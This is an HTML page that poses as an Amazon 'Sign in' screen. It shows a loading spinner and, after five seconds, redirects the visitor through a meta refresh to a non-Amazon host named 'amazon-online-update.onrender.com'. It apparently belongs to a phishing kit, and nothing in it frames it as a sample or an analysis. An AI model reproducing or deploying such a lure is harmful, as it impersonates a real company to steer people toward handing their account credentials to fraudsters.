<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Sign in - amazon</title>
    <link rel="shortcut icon" href="img/icon.png" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" />
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body, html {
            height: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
            background-color: #ffffff;
        }

        .loader {
            border: 5px solid #CDCCC8;
            border-radius: 50%;
            border-top: 5px solid #e2c90a;
            border-left: 5px solid #CDCCC8;
            border-right: 5px solid #CDCCC8;
            width: 60px;
            height: 60px;
            animation: spin 0.7s linear infinite;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        /* For mobile responsiveness */
        @media (max-width: 768px) {
            .loader {
                width: 60px;
                height: 60px;
            }
        }

    </style>
</head>
<body>

<div class="loader"></div>

<meta http-equiv="refresh" content="5;url=https://amazon-online-update.onrender.com" />

</body>
</html>
